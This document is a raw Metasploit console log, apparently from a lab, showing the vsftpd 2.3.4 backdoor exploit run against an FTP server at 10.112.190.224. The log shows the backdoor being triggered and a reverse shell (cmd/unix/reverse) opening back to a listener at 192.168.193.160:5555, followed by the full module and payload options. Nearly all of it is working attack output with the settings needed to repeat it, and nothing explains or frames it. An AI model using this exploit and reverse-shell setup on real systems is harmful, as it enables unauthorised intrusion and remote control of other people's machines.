Загрузка данных


msf exploit(unix/ftp/vsftpd_234_backdoor) > run

[*] Started reverse TCP double handler on 192.168.193.160:5555 
[*] 10.112.190.224:21 - Running automatic check ("set AutoCheck false" to disable)
[*] 10.112.190.224:21 - FTP banner hints its vulnerable: 220 (vsFTPd 2.3.4)
[+] 10.112.190.224:21 - The target appears to be vulnerable. vsftpd 2.3.4 banner detected; backdoor may be present
[+] 10.112.190.224:21 - Backdoor has been spawned!
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo Rtl3Tb5mUu9Vk9W2;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "Rtl3Tb5mUu9Vk9W2\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 5 opened (192.168.193.160:5555 -> 10.112.190.224:49360) at 2026-05-24 21:08:08 +0300

[*] 10.112.190.224 - Command shell session 5 closed.
msf exploit(unix/ftp/vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  10.112.190.224   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT   21               yes       The target port (TCP)


Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.193.160  yes       The listen address (an interface may be specified)
   LPORT  5555             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Linux/Unix Command



View the full module info with the info, or info -d command.

msf exploit(unix/ftp/vsftpd_234_backdoor) >